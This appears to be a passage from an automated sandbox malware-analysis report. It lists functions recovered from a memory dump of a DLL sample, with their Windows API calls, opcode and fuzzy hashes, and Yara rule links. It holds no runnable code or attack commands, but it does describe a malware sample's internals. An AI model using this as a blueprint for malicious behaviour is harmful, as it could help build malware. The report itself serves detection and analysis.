                • Opcode ID: 928557b63724b2babb8bd3d9fc50ee3664bed90131cab6a11c4e1a3571351b50
                • Instruction ID: 12a3515cd75863866a04513a07d05ffc24b624e91076791f9350beb8a1937f93
                • Opcode Fuzzy Hash: 928557b63724b2babb8bd3d9fc50ee3664bed90131cab6a11c4e1a3571351b50
                • Instruction Fuzzy Hash: 7F316BB1901208BFEF109FA6DD49BAE7BF9EB44315F204154F910EB290E3789E95DB24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DC757 Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                Download Yara Rule
                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,046CA2D4,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,?), ref: 046DC776
                • WriteFile.KERNEL32(00000001,00000001,?,?,?), ref: 046DC7AA
                • ReadFile.KERNEL32(00000001,00000001,?,?,?), ref: 046DC7B2
                • GetLastError.KERNEL32 ref: 046DC7BC
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 046DC7D8
                • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 046DC7F1
                • CancelIo.KERNEL32(?), ref: 046DC806
                • CloseHandle.KERNEL32(?), ref: 046DC816
                • GetLastError.KERNEL32 ref: 046DC81E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                • String ID:
                • API String ID: 4263211335-0
                • Opcode ID: 844d53022a769efab28228a7ea68e0067a76b1fbf22c7338b6fbdda2c5f2f02d
                • Instruction ID: fafd61d044bbac4758cc78e32b468f3cac6a42672acd2690f62102febbdf1bd6
                • Opcode Fuzzy Hash: 844d53022a769efab28228a7ea68e0067a76b1fbf22c7338b6fbdda2c5f2f02d
                • Instruction Fuzzy Hash: 83213B7290011CAFDB11AFA9D8489EE7BB9FB48351F008426F916D7240E774AA41CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DECAB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046DECB7
                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 046DECCD
                • _snwprintf.NTDLL ref: 046DECF2
                • CreateFileMappingW.KERNEL32(000000FF,046EE268,00000004,00000000,00001000,?), ref: 046DED0E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED20
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 046DED37
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 046DED58
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: a6d7d12239d5e9e6ff54650034220e80a40fc71c0280925e9c5fbe5ee70334d3
                • Instruction ID: 455135c3c34561399a3ba2d4b93bf631e54fc9aaeb9d86f0b09cd52c0c7efddf
                • Opcode Fuzzy Hash: a6d7d12239d5e9e6ff54650034220e80a40fc71c0280925e9c5fbe5ee70334d3
                • Instruction Fuzzy Hash: D5210576A41208BBD721AF55CC04F9D37E9EB94710F200026F606EF290FA71A9018B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D8170 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(00000000,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,00000000,00000000,00000000), ref: 046D826E
                • lstrcpyW.KERNEL32(00000000,?), ref: 046D8291
                • lstrcatW.KERNEL32(00000000,00000000), ref: 046D8299
                • lstrlenW.KERNEL32(00000000,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?,?,04C99A03,?), ref: 046D82E4
                • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 046D834C
                • LocalFree.KERNEL32(?,00000006), ref: 046D8363
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                • String ID: P
                • API String ID: 3649579052-3110715001
                • Opcode ID: 0a686e8deb1a88fabbd35598e9e43d346625d6a089462034a091c381ffaf6f7f
                • Instruction ID: deab2f22ccfca48ac95ac95c4abdf6321374e1176e35eea7e6bee2634dcda4be
                • Opcode Fuzzy Hash: 0a686e8deb1a88fabbd35598e9e43d346625d6a089462034a091c381ffaf6f7f
                • Instruction Fuzzy Hash: D9615C71E0020AEFDF10EFA5DC88DAE7BB9EB44344B055029E519AB211F735E945CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CED0A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145timestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C7A3C: InterlockedIncrement.KERNEL32(?), ref: 046C7A8D
                  • Part of subcall function 046C7A3C: RtlLeaveCriticalSection.NTDLL(04C9C148), ref: 046C7B18
                • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 046CED64
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 046CED82
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CEDE8
                • lstrlenW.KERNEL32(?), ref: 046CEE5D
                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 046CEE79
                • memcpy.NTDLL(00000014,?,00000002), ref: 046CEE91
                  • Part of subcall function 046C56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046C5771
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                • String ID: o
                • API String ID: 2541713525-252678980
                • Opcode ID: 9c231f9bb93eae95a192dce8e76cce03f4d3bd4e8cb5c75466ee7ef46e7bc83b
                • Instruction ID: 612d3a93e966874a82cc063e7a6d104e0e46fe81b424433d9cfd0e2890331635
                • Opcode Fuzzy Hash: 9c231f9bb93eae95a192dce8e76cce03f4d3bd4e8cb5c75466ee7ef46e7bc83b
                • Instruction Fuzzy Hash: E45179B1640606EFE720DF65C888BAAB7F8FB18744F04452DE9059B250F775F9848B94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB89D Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 046DB8E2
                • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 046DB8FA
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB95C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DB970
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,046C140C,?), ref: 046DB9C2
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9EB
                • HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9FB
                • RegCloseKey.ADVAPI32(?,?,?,?,046C140C,?), ref: 046DBA04
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                • String ID:
                • API String ID: 3503961013-0
                • Opcode ID: 3390f996f2ae5ef4b927817b1b0579f5b3f260e5c68204f57f07a9abe76eef47
                • Instruction ID: e7e2c1cc0cf56375a250ce8dd0f279fc3dd03610c6e6ac30a048c4eefcd3aa51
                • Opcode Fuzzy Hash: 3390f996f2ae5ef4b927817b1b0579f5b3f260e5c68204f57f07a9abe76eef47
                • Instruction Fuzzy Hash: 224104B5C00209EFDF019F96DC848EEBBB9FB08344F10446AE510AA214E3356E95EF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CE3A4 Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C6410), ref: 046CE3BA
                • wsprintfA.USER32 ref: 046CE3E2
                • lstrlen.KERNEL32(?), ref: 046CE3F1
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • wsprintfA.USER32 ref: 046CE431
                • wsprintfA.USER32 ref: 046CE466
                • memcpy.NTDLL(00000000,?,?), ref: 046CE473
                • memcpy.NTDLL(00000008,046E83F8,00000002,00000000,?,?), ref: 046CE488
                • wsprintfA.USER32 ref: 046CE4AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                • String ID:
                • API String ID: 2937943280-0
                • Opcode ID: c2fc0703281981f4d3d911bef56abca7762b4357c72ffb366412cad9f43a2339
                • Instruction ID: 789bce4897be07f27340d86f549f0bb6fe4524622dbb45a1f4af8daca106f486
                • Opcode Fuzzy Hash: c2fc0703281981f4d3d911bef56abca7762b4357c72ffb366412cad9f43a2339
                • Instruction Fuzzy Hash: 47411D75A0020AEFDB14DFA9C984DAAB7F8EF44308B148469E919D7211FB35FE058B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D8EB0 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?), ref: 046D8ED4
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D8EE6
                • wcstombs.NTDLL ref: 046D8EF4
                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?), ref: 046D8F18
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046D8F2D
                • mbstowcs.NTDLL ref: 046D8F3A
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F4C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F66
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 316328430-0
                • Opcode ID: bfdd2f06d461f6d63168e3777e830312dfc1b4a616b69496027624b66aefd895
                • Instruction ID: 6a722394563f2111a18eddc9c688c1de410964e2e3b8a9e4bfe848c9729e68f4
                • Opcode Fuzzy Hash: bfdd2f06d461f6d63168e3777e830312dfc1b4a616b69496027624b66aefd895
                • Instruction Fuzzy Hash: 75213A31900209FFDF10AFA6EC08F9A7FB9EB54344F104125BA15A7160E7759E65DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C2727 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(00000040,00000000,?), ref: 046C2733
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046C2751
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C2759
                • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 046C2777
                • GetLastError.KERNEL32 ref: 046C278B
                • RegCloseKey.ADVAPI32(?), ref: 046C2796
                • CloseHandle.KERNEL32(00000000), ref: 046C279D
                • GetLastError.KERNEL32 ref: 046C27A5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                • String ID:
                • API String ID: 3822162776-0
                • Opcode ID: 9e452e16e66f70cb08c3945aab5d44a5dc2b4021d4b4b6b235bb73de66f1706a
                • Instruction ID: 50febf02200c7c22d9112f039cabc7bcc1ee7966e84539075ff56ccfc30fcbdb
                • Opcode Fuzzy Hash: 9e452e16e66f70cb08c3945aab5d44a5dc2b4021d4b4b6b235bb73de66f1706a
                • Instruction Fuzzy Hash: 4A115E79240205EFDB015F51D898B6A3BA9EB48361F109025FD06CB240FB75DD11DB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C7056 Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e14977d6e37f76aa20090f899f0dbb054d331d294811bfac704e2e0dc11fa6ac
                • Instruction ID: f9edcc946ed0afb33aa41707924203e597c589681d442a9d050e2a7db404f03e
                • Opcode Fuzzy Hash: e14977d6e37f76aa20090f899f0dbb054d331d294811bfac704e2e0dc11fa6ac
                • Instruction Fuzzy Hash: A1B10471D0021AEFDF21AFA5CC08AFEBBB5EF14356F044069E800B6260E335AA55DF95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9287 Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                Download Yara Rule
                APIs
                • GetCommandLineA.KERNEL32(046EA5D0,00000038,046DE924,00000000,74E5F5B0,046D47CC,?,00000001,?,?,?,?,?,?,?,046C8D64), ref: 046D9298
                • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D92A9
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                • ExitProcess.KERNEL32 ref: 046D948B
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,7673D3B0,04C9C0D4,00000000,?,046E321D,?), ref: 046E2AFF
                  • Part of subcall function 046E2ADA: StrTrimA.SHLWAPI(00000020,046EA4A4,00000000,?,046E321D,?), ref: 046E2B1E
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,?,046E321D,?), ref: 046E2B2A
                • lstrcmp.KERNEL32(?,?), ref: 046D9317
                • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,046C8D64,?), ref: 046D932F
                  • Part of subcall function 046D05BB: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,04C9B7F0,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046D05FB
                  • Part of subcall function 046D05BB: CloseHandle.KERNEL32(000000FF,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046D0606
                • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,046C8D64,?), ref: 046D93A1
                • lstrcmp.KERNEL32(?,?), ref: 046D93BA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                • String ID:
                • API String ID: 739714153-0
                • Opcode ID: f0b3fdf1594588e788bf93777bf62cd34fb3ed6dab50e16170af0ab8667e178b
                • Instruction ID: 98b231d1030983c726c5e2ad8da5968caf8e9a54b99be50e08fe8d80b7dbcc8b
                • Opcode Fuzzy Hash: f0b3fdf1594588e788bf93777bf62cd34fb3ed6dab50e16170af0ab8667e178b
                • Instruction Fuzzy Hash: 59513EB1D00219AFDF10AFA1CC88AEE7BB9EF18704F144419E501EA151FB75B945CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9052 Relevance: 10.6, APIs: 7, Instructions: 136memorystringCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 046D907D
                • StrTrimA.SHLWAPI(00000000,?), ref: 046D909A
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D90CD
                • RtlImageNtHeader.NTDLL(00000000), ref: 046D90F6
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 046D91B8
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 046D9169
                • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 046D9198
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                • String ID:
                • API String ID: 239510280-0
                • Opcode ID: 65d1d0fbf08435f4c405866b0fb80a2b04370e09b943012653a4c4e7497adc89
                • Instruction ID: 852bad196855b899d4a39da9c4c58a21f4951ca901779b029c66630fe5f2017b
                • Opcode Fuzzy Hash: 65d1d0fbf08435f4c405866b0fb80a2b04370e09b943012653a4c4e7497adc89
                • Instruction Fuzzy Hash: B941D571B40205FFEB219B55DC48FAE7BB9EB48744F100029F505AB290FB76AE49DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E33E1 Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E343A
                • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3458
                • RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 046E3481
                • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3498
                • HeapFree.KERNEL32(00000000,00000000), ref: 046E34AB
                • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E34BA
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E351E
                  • Part of subcall function 046C56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046C5771
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                • String ID:
                • API String ID: 1635816815-0
                • Opcode ID: 17d65cbd83c60c01aaebe952dbdb83674a6525483018922204f9f1389fbacd81
                • Instruction ID: 7f3c3d982f08ca4716197a0e384728d2f36c5884c77567c359e3abe7a12d276b
                • Opcode Fuzzy Hash: 17d65cbd83c60c01aaebe952dbdb83674a6525483018922204f9f1389fbacd81
                • Instruction Fuzzy Hash: 2D417371901318EFDB229FA6CC44BAE7BE4EF14354F044068EC05AB350E771AD94DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E382A Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 046E386B
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 046E3899
                • GetWindowThreadProcessId.USER32(?,?), ref: 046E38DE
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 046E3906
                • _strupr.NTDLL ref: 046E3931
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 046E393E
                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 046E3958
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                • String ID:
                • API String ID: 3831658075-0
                • Opcode ID: 27d719a1a1380fc30ee8bbc472b44913990ec08663961312b08ca52f16091c28
                • Instruction ID: 7636825507d02c5d292530d104dff8eda0739b057647872372e51810f5d49feb
                • Opcode Fuzzy Hash: 27d719a1a1380fc30ee8bbc472b44913990ec08663961312b08ca52f16091c28
                • Instruction Fuzzy Hash: 03410D71D01219EFDF219FA6CC45BEEBBF9EB54701F14405AEA00A7250E7759A80CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CAC05 Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL ref: 046CAC2E
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046CAC71
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046CAC8C
                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 046CACE2
                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 046CAD3D
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 046CAD4B
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046CAD56
                  • Part of subcall function 046C2237: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 046C224B
                  • Part of subcall function 046C2237: memcpy.NTDLL(00000000,046D153B,?,?,-00000005,?,046D153B,00000001,00000000,-00000005,00000001), ref: 046C2274
                  • Part of subcall function 046C2237: RegCloseKey.ADVAPI32(?,?,046D153B,00000001,00000000,-00000005,00000001), ref: 046C22C8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                • String ID:
                • API String ID: 2070110485-0
                • Opcode ID: e4608bef2dbc7ead41ddf3757c3d78d753bee4425648a6fedea1c24aed1b10ab
                • Instruction ID: 96533fdf91a1d012a663e2aa48d232354eb51b84df2dfad2fb97ff53bed7b3a6
                • Opcode Fuzzy Hash: e4608bef2dbc7ead41ddf3757c3d78d753bee4425648a6fedea1c24aed1b10ab
                • Instruction Fuzzy Hash: AD416EB220020AAFEB219FA6D848F7A37EDEB50745F040029F9059B251FB75ED41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DAF39 Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(046EE0EC), ref: 046DAF4B
                • lstrcpy.KERNEL32(00000000), ref: 046DAF87
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • GetLastError.KERNEL32(00000000), ref: 046DB016
                • HeapFree.KERNEL32(00000000,?), ref: 046DB02D
                • InterlockedDecrement.KERNEL32(046EE0EC), ref: 046DB044
                • DeleteFileA.KERNEL32(00000000), ref: 046DB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DB075
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 5252b2def555c34f0bf276d54b8f5c4d9379a62f70553e8689547533ada5b1ac
                • Instruction ID: 7aaf7a5905f64678e59b52e68638e62e7d57f1fa6bdfcaf70b51b1a834c9e753
                • Opcode Fuzzy Hash: 5252b2def555c34f0bf276d54b8f5c4d9379a62f70553e8689547533ada5b1ac
                • Instruction Fuzzy Hash: DE31C532D00114EBDB21AFA2D848AAD7AF4EB48B45F114069F914AB250F775AE41DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CC4B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,046DF266,00000000), ref: 046CC4CD
                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 046CC4E2
                • memset.NTDLL ref: 046CC4EF
                • HeapFree.KERNEL32(00000000,00000000,?,046DF265,?,?,00000000,?,00000000,046CFB8A,?,00000000), ref: 046CC50C
                • memcpy.NTDLL(?,?,046DF265,?,046DF265,?,?,00000000,?,00000000,046CFB8A,?,00000000), ref: 046CC52D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freememcpymemset
                • String ID: chun
                • API String ID: 2362494589-3058818181
                • Opcode ID: e128ee85fa5a30bcaeb511ff71d5236f5f78d058d08ccce6f946ebc27cf3735e
                • Instruction ID: bc5ebb690bbf629c1d3c0a766e5566ff18d1231d4fc70143a2c2f41215a6c0dd
                • Opcode Fuzzy Hash: e128ee85fa5a30bcaeb511ff71d5236f5f78d058d08ccce6f946ebc27cf3735e
                • Instruction Fuzzy Hash: 20316B71600706AFE720DF6AD844A66BBE8EF58314F41442EE949CB620F771FD25CBA0
                Uniqueness

                Uniqueness Score: -1.00%

